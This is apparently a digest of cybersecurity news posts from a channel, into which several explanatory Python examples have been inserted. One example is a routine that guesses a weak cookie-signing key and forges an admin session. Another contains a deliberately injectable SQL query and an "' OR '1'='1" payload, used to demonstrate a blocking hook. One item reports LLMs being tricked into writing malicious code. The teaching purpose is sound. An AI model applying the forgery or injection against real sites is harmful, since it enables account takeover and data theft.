The Forrester Consulting TEI of Guardium Data Protection study: 5 Data Security Lessons
A Forrester Consulting Total Economic Impact (TEI) study commissioned by IBM for its IBM Security Guardium Data Protection product.
The TEI study focuses specifically on Guardium Data Protection, but its interviews with security professionals reveal common concerns that data security analysts (DSAs) face.
- Visibility
- Compatibility
- Automated monitoring
- Easier audits
- Adapting to changing regulations
@Cyber_Security_Channel
AI Hallucinations Could Be a Cybersecurity Risk
AI is trained from massive data sets, often containing flaws like thought gaps, content saliency variance, or harmful biases.
Any training from these incomplete or inadequate data sets could be the root of hallucinations, even if later iterations of the data set received curation from data scientists.
@Cyber_Security_Channel
EY Breach Exposes Bank of America Customer Credit Card Numbers
Experts warn that even seemingly insignificant pieces of leaked personal information can be collated to have a devastating impact.
Victims whose data has been leaked often don’t realize they’ve been compromised and therefore take no action to mitigate the outcome.
EY said that Bank of America will provide exposed clients with a “complimentary two-year membership in an identity theft protection service.”
The letter urges potential victims to be vigilant and cautiously review account statements and credit reports for suspicious activity.
@Cyber_Security_Channel
Your Data Protection Checklist
Under certain criteria, regulations such as the GDPR mandate a DPO’s appointment.
However, even if it is optional, you may consider appointing an independent and impartial advisor that will supervise data protection governance in the organization.
They should have expertise in data privacy and security practices and a solid grasp of business processes and industry specifics.
@Cyber_Security_Channel
DARPA, White House launch $20M AI, Cybersecurity Challenge
Dubbed the “AI Cyber Challenge,” or AIxCC, the effort aims to “challenge competitors across the United States, to identify and fix software vulnerabilities using AI,” the White House announced today.
Google, Microsoft, OpenAI and Anthropic will lend expertise and technologies for the challenge.
DARPA will host an open competition for AIxCC where up to 20 teams will advance to the semifinals next August at the DEF CON 2024 conference, followed by up to five teams advancing to the finals, according to the agency’s website.
In August 2025, three winners will be chosen at DEF CON 2025. AIxCC will feature almost $20 million in prizes, according to the White House.
@Cyber_Security_Channel
AmiViz and Darktrace Announce Cybersecurity Partnership
Darktrace’s Cyber AI Loop prevents, detects, responds, and heals from cyber-attacks, all at once, at all times, everywhere an organization touches data and people, whether that’s outside on the attack surface or inside the organization.
AmiViz is the first B2B enterprise marketplace focused on the cybersecurity industry in the Middle East, designed specifically to serve the interests of enterprise resellers and vendors.
Driven by innovation and AI-powered technology, the platform provides a unique collaboration platform through a mobile application on iOS and Android, as well as a web-based platform to enterprise resellers, consultants, system integrators, channel partners, and vendors.
AmiViz and Darktrace will work closely to roll out several new channel initiatives to enhance collaboration and drive greater customer value.
AmiViz will help conduct technical and sales workshops, support proof of concept, and extend pre-sales, implementation, and first-line support to its partners across the region.
@Cyber_Security_Channel
IBM Researchers Easily Trick ChatGPT Into Hacking
Researchers at IBM released a report Tuesday detailing easy workarounds they've uncovered to get large language models (LLMs) — including ChatGPT — to write malicious code and give poor security advice.
All it takes is knowledge of the English language and a bit of background knowledge on how these models were trained to get them to help with malicious acts.
@Cyber_Security_Channel
Royal, Hive, Black Basta Ransomware Gangs ‘Collaborating on Cyber Attacks’
There were “distinct similarities” between techniques employed during four different incidents at the beginning of 2023, analysis showed, raising questions over whether the gangs have been collaborating.
“Despite Royal being a notoriously closed off group that doesn’t openly solicit affiliates from underground forums, granular similarities in the forensics of the attacks suggest all three groups are sharing either affiliates or highly specific technical details of their activities,” Sophos said.
@Cyber_Security_Channel
Google Awards USD 15,000 to Apple Security Team for Finding Bug in Chrome Web Browser
The collaboration between tech companies in identifying and addressing security vulnerabilities is crucial for maintaining the safety and privacy of users’ data and ensuring the overall security of online platforms.
The ‘CVE-2023-4072’ vulnerability is a high-severity security flaw in Google Chrome’s WebGL implementation, reported by Apple’s security team and fixed in Chrome 115. It is classified as an “out of bounds read and write” bug, which means that an attacker could read and modify memory beyond the space allocated for an object, a primitive that is commonly chained into memory-corruption exploits.
@Cyber_Security_Channel
GDPR Fines Just 6% of the Total Cost of Data Breaches
The most common causes of the breaches in the research weren’t cyber attacks.
Only a third (33%) of breaches reported were due to malware or phishing, with all breaches caused by threats from outside an organization accounting for 35% of reports. Insider threats, however, came to 40%.
Human error accounted for more – 23% were caused by data being shared with the wrong person, while 11% was due to lost or stolen data.
This includes, for example, stolen devices or paperwork being left in an unsecured location.
@Cyber_Security_Channel
Downfall: New Intel CPU Attack Exposing Sensitive Information
The flaw was discovered by Daniel Moghimi, a Google senior research scientist.
“I discovered that the Gather instruction, meant to speed up accessing scattered data in memory, leaks the content of the internal vector register file during speculative execution.
To exploit this vulnerability, I introduced Gather Data Sampling (GDS) and Gather Value Injection (GVI) techniques,” Moghimi added.
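On Linux, the kernel reports whether a host is exposed to Downfall (and whether the microcode mitigation is active) through sysfs, on kernels that carry the GDS mitigation (6.5 and the stable backports). The following is an added example, not code from the page or from the researcher, that reads and classifies that status; the status strings are the ones the kernel documents for the gather_data_sampling file, and the sample strings in the test are constructed.

```python
from pathlib import Path
from typing import Optional, Tuple

# Kernel-reported status for Gather Data Sampling (Downfall, CVE-2022-40982).
SYSFS_GDS = Path("/sys/devices/system/cpu/vulnerabilities/gather_data_sampling")


def classify_gds(status: Optional[str]) -> Tuple[str, str]:
    """Map a sysfs status string to (verdict, advice).

    Verdicts: ok | mitigated | vulnerable | unknown.
    A None status means the file does not exist, i.e. the kernel predates
    GDS reporting and cannot be trusted to have the mitigation at all.
    """
    if status is None:
        return ("unknown", "kernel does not report GDS; update the kernel and microcode")
    s = status.strip()
    if s == "Not affected":
        return ("ok", "CPU not affected by GDS")
    if s.startswith("Mitigation: Microcode"):
        # "(locked)" means the mitigation cannot be disabled via gather_data_sampling=off
        locked = "(locked)" in s
        return ("mitigated", "microcode mitigation active" + (" and locked" if locked else ""))
    if s.startswith("Vulnerable: No microcode"):
        return ("vulnerable", "CPU affected and no updated microcode loaded; install microcode")
    if s.startswith("Vulnerable"):
        return ("vulnerable", "mitigation disabled; remove gather_data_sampling=off or mitigations=off")
    if s.startswith("Unknown"):
        return ("unknown", "guest kernel; status depends on the hypervisor's microcode")
    return ("unknown", f"unrecognised status: {s!r}")


def read_gds_status(path: Path = SYSFS_GDS) -> Optional[str]:
    """Return the raw sysfs text, or None when the kernel does not expose it."""
    try:
        return path.read_text()
    except FileNotFoundError:
        return None


def check_host(path: Path = SYSFS_GDS) -> Tuple[str, str]:
    """Convenience wrapper: classify the live host."""
    return classify_gds(read_gds_status(path))


if __name__ == "__main__":
    verdict, advice = check_host()
    print(f"gather_data_sampling: {verdict} ({advice})")
```

Run it on the host itself; on an affected Intel part with the August 2023 microcode loaded the kernel reports "Mitigation: Microcode", and on a VM the "Unknown" verdict is the signal to ask the hosting provider rather than the guest.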
@Cyber_Security_Channel
Protection is No Longer Straightforward – Why More Cybersecurity Solutions Must Incorporate Context
Think of it like making a trip to the Emergency Room.
The admitting ER physician is not likely to make a diagnosis and prescribe treatment based solely on the symptoms presented by the patient.
Doing so could lead to complications or further injury.
Instead, the physician must also consider additional context, such as past illnesses, medications, allergies, surgeries, and other relevant information. In many cases, it would be life-threatening if the physician had to take the time to make calls to previous doctors, pharmacies, etc., to gather this information.
@Cyber_Security_Channel
How to Get Unlimited Airline Miles: Researchers Find the Cheat Codes
Vulnerabilities in the Points.com API could have been exploited to expose customer data, steal customers’ “loyalty currency” (like miles), or even compromise Points global administration accounts to gain control of entire loyalty programs.
An encrypted cookie assigned to each user had been encrypted with an easily guessable secret—the word “secret” … the researchers could decrypt their cookie, reassign themselves global administrator privileges for the site … and essentially assume god-mode-like capabilities
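The Points.com cookie format is not published on this page, so the following is an added example in a stand-in scheme, not the researchers' code: a session cookie whose integrity rests on a fixed, guessable key. The cookie layout (base64 JSON plus an HMAC tag), the wordlist and the claim names are assumptions; the point it demonstrates is the same as the finding above, namely that once the key is "secret", anyone can recover it, rewrite their own role and re-sign the cookie.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Iterable, Optional

# Assumed vulnerable server secret, as in the finding: the literal word "secret".
WEAK_SECRET = b"secret"

# Constructed attacker wordlist of secrets commonly seen in deployed apps.
WORDLIST = [b"password", b"changeme", b"secret", b"key", b"123456"]


def sign_cookie(claims: dict, key: bytes) -> str:
    """Server side (assumed scheme): base64url(JSON) + "." + HMAC-SHA256 tag."""
    body = base64.urlsafe_b64encode(json.dumps(claims, sort_keys=True).encode()).decode()
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def verify_cookie(cookie: str, key: bytes) -> Optional[dict]:
    """Return the claims if the tag verifies under key, else None."""
    body, _, tag = cookie.rpartition(".")
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return json.loads(base64.urlsafe_b64decode(body))


def recover_secret(cookie: str, wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Attacker side: a cookie you legitimately own is a free test oracle for the key."""
    for candidate in wordlist:
        if verify_cookie(cookie, candidate) is not None:
            return candidate
    return None


def forge_admin_cookie(cookie: str, wordlist: Iterable[bytes]) -> Optional[str]:
    """Rewrite our own session to global administrator once the key is known."""
    key = recover_secret(cookie, wordlist)
    if key is None:
        return None  # strong, unguessable key: nothing to forge
    claims = verify_cookie(cookie, key)
    claims["role"] = "global_admin"
    return sign_cookie(claims, key)


def strong_key() -> bytes:
    """The fix: a random 256-bit key from the OS CSPRNG, never a dictionary word."""
    return secrets.token_bytes(32)


if __name__ == "__main__":
    mine = sign_cookie({"user": "alice", "role": "member"}, WEAK_SECRET)
    forged = forge_admin_cookie(mine, WORDLIST)
    print("recovered key:", recover_secret(mine, WORDLIST))
    print("forged cookie verifies as:", verify_cookie(forged, WEAK_SECRET))
```

The same attack against a cookie signed with strong_key() returns None at the recovery step, which is the only property that matters here: the HMAC construction is sound, the key was not.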
@Cyber_Security_Channel
Understanding the Role of Runtime Application Self-Protection (RASP) in Cybersecurity
The primary function of RASP is to identify and block attacks in real-time.
It does this by continuously monitoring the behavior of an application, identifying malicious activities, and preventing them from causing harm.
This is particularly important in today’s digital landscape where attacks are becoming more sophisticated and harder to detect with traditional security tools.
RASP’s real-time response capability is another significant advantage. In the event of an attack, RASP can immediately take action to prevent the attack from progressing.
This could involve terminating a user’s session, stopping an application’s execution, or alerting the security team.
This immediate response can significantly reduce the potential damage caused by an attack.
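To make the "monitor the application's own behaviour and block at the sink" idea concrete, here is an added example, not code from the page or from any RASP vendor, of a minimal RASP-style hook in Python: request inputs are recorded for the current request, the database cursor is wrapped, and a query is refused when a request input that carries SQL syntax has been reflected verbatim into the query text. The in-memory SQLite table, the lookup functions and the RaspBlocked exception are constructed for the demonstration.

```python
import contextvars
import logging
import sqlite3
from typing import Iterable, List

log = logging.getLogger("rasp")

# Per-request record of untrusted inputs, set by the framework layer (assumed).
_request_inputs: contextvars.ContextVar = contextvars.ContextVar("request_inputs", default=())

SQL_META = ("'", "\"", "--", ";", "/*")


class RaspBlocked(Exception):
    """Raised when the hook refuses to execute a query."""


def set_request_inputs(values: Iterable[str]) -> None:
    _request_inputs.set(tuple(values))


def looks_injected(sql: str, inputs: Iterable[str]) -> bool:
    # Block only when an untrusted value appears verbatim in the SQL text AND
    # contains SQL syntax. A bound parameter never appears in the text, so
    # parameterised queries pass regardless of what the user sent.
    return any(v and v in sql and any(m in v for m in SQL_META) for v in inputs)


class GuardedCursor:
    """Runtime hook around the real cursor: the application is not modified."""

    def __init__(self, cursor: sqlite3.Cursor):
        self._cursor = cursor

    def execute(self, sql: str, params=()):
        if looks_injected(sql, _request_inputs.get()):
            log.warning("blocked SQL injection attempt: %r", sql)
            raise RaspBlocked(sql)
        return self._cursor.execute(sql, params)

    def fetchall(self):
        return self._cursor.fetchall()


def _setup() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [("alice", "user"), ("bob", "admin")])
    return conn


CONN = _setup()


def lookup_vulnerable(name: str) -> List[str]:
    """Application code with a classic string-built query."""
    set_request_inputs([name])
    cur = GuardedCursor(CONN.cursor())
    cur.execute(f"SELECT name FROM users WHERE name = '{name}'")
    return [row[0] for row in cur.fetchall()]


def lookup_safe(name: str) -> List[str]:
    """Same lookup, parameterised; the hook never fires for it."""
    set_request_inputs([name])
    cur = GuardedCursor(CONN.cursor())
    cur.execute("SELECT name FROM users WHERE name = ?", (name,))
    return [row[0] for row in cur.fetchall()]


def blocked(fn, name: str) -> bool:
    """True if the RASP hook stopped the call, False if it ran through."""
    try:
        fn(name)
        return False
    except RaspBlocked:
        return True


if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    print(lookup_vulnerable("alice"))
    print("blocked:", blocked(lookup_vulnerable, "' OR '1'='1"))
    print(lookup_safe("' OR '1'='1"))
```

Note the caveat a practitioner should keep in mind: this hook only sees what reaches the sink it wraps, so a second entry point (an ORM raw-query helper, a stored procedure, a different driver) needs its own instrumentation, and the detection rule is deliberately narrow to keep false positives, and therefore blocked legitimate requests, low.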
@Cyber_Security_Channel
Cybersecurity: What the Defense Industry Needs to Unlock to Stay Ahead
Cybersecurity is a key requirement for supporting software infrastructure across the entire military supply chain due to the recent increase in cyber warfare.
Organizations’ systems must be pen-tested and have enough built-in protection to avert and react to attempted data breaches or cyberattacks.
@Cyber_Security_Channel
BlackBerry: AI Cybersecurity Pioneer, BlackBerry Introduced Major Update to Next-Generation AI Engine
BlackBerry pioneered the field of AI for predictive cyber defense, and today delivers the highest efficacy scores against the competition whether an endpoint is online or offline.
Cylance AI enables organizations to stay ahead of cyberattacks without sacrificing operational efficiency.
Rolled out automatically to all BlackBerry customers currently using CylanceENDPOINT™, CylanceEDGE™ and CylanceGUARD®, the new engine builds upon previous iterations that stop attacks 12 times faster and with 20 times less resources than other cybersecurity solutions.
@Cyber_Security_Channel
Black Hat USA: Cybersecurity Community Can Help with National Security Policy
The CrowdSec Partner Program operates on three different tiers: silver, gold and platinum.
Each partner receives free training and certification through the CrowdSec Academy, and will have the opportunity to grow through the tiers, which offer different business benefits, such as revenue sharing, dedicated training and exclusive access to product features.
With a partner-first approach, CrowdSec’s primary goal is to elevate existing and future partners, and boost their revenue by providing them with comprehensive marketing resources, training and support.
@Cyber_Security_Channel
'Sufficient Protections Not in Place' to Prevent Data Breach, Regulator Admits
The Electoral Commission expressed its “regret that sufficient protections were not in place to prevent this cyberattack” and indicated that, working with its security providers and experts from the National Cyber Security Centre, it has taken steps since the breach to improve its security systems and processes.
“We have strengthened our network login requirements, improved the monitoring and alert system for active threats and reviewed and updated our firewall policies,” it said.
@Cyber_Security_Channel
Jericho Security Uses AI to Fight AI in New Frontier of Cybersecurity
Jericho Security’s approach marks a new frontier for cybersecurity, using machine-learning capabilities to essentially “fight AI with AI.”
Jericho pits an AI red team against an AI blue team in simulations to uncover vulnerabilities and develop more robust defenses. Jericho Security is the result of decades of collective observation of the evolution of cybersecurity threats by its founders.
@Cyber_Security_Channel
🏹 Get Ready To Hunt 2FA Bugs like a Pro!
Looking for a way to approach Two Factor Authentication Bugs?
Our partners at Hacklido have a digital product that will help you find effective solutions.
↳ It shows you the process of finding 2FA flaws
Grab your copy and improve your skills:
→ https://gumroad.com/a/631226579/jdvwcd
Third Parties Can Intervene in Belgian Data Protection Authority Proceedings and Appeal Its Decisions
A first step to amend the legal framework and to develop a specific provision on appeal possibilities for interested third parties took place on 12 January 2023 as a result of a decision by the Belgian Constitutional Court.
The Constitutional Court agreed that the lack of remedies for interested third parties against decisions of the Litigation Chamber of the BDPA was not in line with the constitutional principle of equality.
The legislator has now gone one step further by giving appeal as well as intervention possibilities to interested third parties.
@Cyber_Security_Channel
White House Offers Prize Money for Hacker-Thwarting AI
To boost participation, the Defense Advanced Research Projects Agency (DARPA) running the competition will put $7 million into funding small businesses that want to compete, according to the White House.
DARPA is collaborating with AI tech titans Anthropic, Google, Microsoft, and ChatGPT-maker OpenAI, which will provide expertise and technology for the competition, Prabhakar said.
@Cyber_Security_Channel
Case from a few days ago: Tesla's Software Cracked: Offers Free Upgrades That Even Musk Can't Fix
A recent revelation by a security researcher and a trio of PhD students from Germany has sent shockwaves across the automobile industry.
The team has reportedly found a backdoor to Tesla's sophisticated, AMD-based cars. They've managed to devise what could be the world's first unpatchable "Tesla Jailbreak", poised to unlock a trove of paid features – all for free.
@Cyber_Security_Channel
Cornell introduces new AI-focused Board Governance program
The program offers presentations, panel discussions and networking events designed specifically for current board members of public and private companies.
Participants will explore matters in AI, data privacy, algorithmic bias and antitrust.
The small cohort size is intended to ensure high-quality peer-to-peer engagement on key issues and solutions that participants can directly apply to their organizations.
@Cyber_Security_Channel
The Importance Of Safeguarding Businesses From Data Privacy And Cybersecurity Risk
Data privacy is the handling and safeguarding of personal or sensitive information, sometimes by multiple parties.
Businesses collect customer data for different reasons, but their primary purposes are to improve services, understand user behavior, and make efforts toward marketing.
@Cyber_Security_Channel
Regtech and Cybersecurity: Strengthening Data Protection in Compliance
Regtech is the application of modern technology, such as artificial intelligence (AI), machine learning, and big data analytics, to streamline and automate regulatory compliance processes.
The goal of regtech is to assist financial institutions in staying ahead of regulatory developments, ensuring compliance, and efficiently managing complicated reporting requirements.
Beyond just compliance, regtech offers the ability to improve cybersecurity and data protection policies.
@Cyber_Security_Channel
Average Cost of a Data Breach Has Reached an All-Time High: IBM Report
Involving law enforcement in a ransomware attack also saved money and shortened the lifecycle of the breach.
Organizations that didn’t involve law enforcement in a ransomware attack incurred an additional $470,000 in expenses on average.
About 63% of respondents said they involved law enforcement.
The 37% that didn’t involve law enforcement paid 9.6% more and experienced a 33-day longer breach lifecycle.
@Cyber_Security_Channel
When Your Teammate is a Machine: 8 Questions CISOs Should be Asking About AI
AI will effectively become an extension of automation processes and can uncover a vastly expanded breadth and span of information, helping to evaluate complexities at greater and greater speeds.
1. Did comprehensive testing to ensure the AI algorithm works as intended occur?
2. From where did the data used to train the AI come?
3. How was the AI algorithm designed to prevent, or mitigate as much as possible, bias in the results?
4. How was the algorithm designed to mitigate the new and challenging risks that emerge almost daily related to generative AI?
5. Has the vendor comprehensively addressed security concerns related to machine learning and if so, how?
6. Has the AI been engineered to account for the complexity of AI systems attack surfaces and if so, in what ways?
7. How have supply chain and third-party AI components been reviewed for security and privacy risk, and then mitigated?
8. Has the AI manufacturer or vendor developed their AI products to meet data protection compliance for the areas in which they will be sold?
@Cyber_Security_Channel
KnowBe4 PhishER Plus Uses Triple-Validated Phishing Threat Feed
PhishER Plus users are trained to spot and report phishing attacks, KnowBe4 stated.
The information these users gather about phishing attacks is incorporated into the PhishER Plus Global Blocklist.
KnowBe4 provides a security awareness training and simulated phishing platform used by more than 60,000 organizations, the company said.
It also offers a partner program for MSSPs, MSPs and other technology providers.
@Cyber_Security_Channel
Norway Imposes Heavy Fines on Meta Platforms for Privacy Violations
The specific breach in question involves Meta’s practice of collecting user data, such as their physical locations in Norway, and subsequently using this data for targeted behavioral advertising, a model commonly adopted across the tech industry.
@Cyber_Security_Channel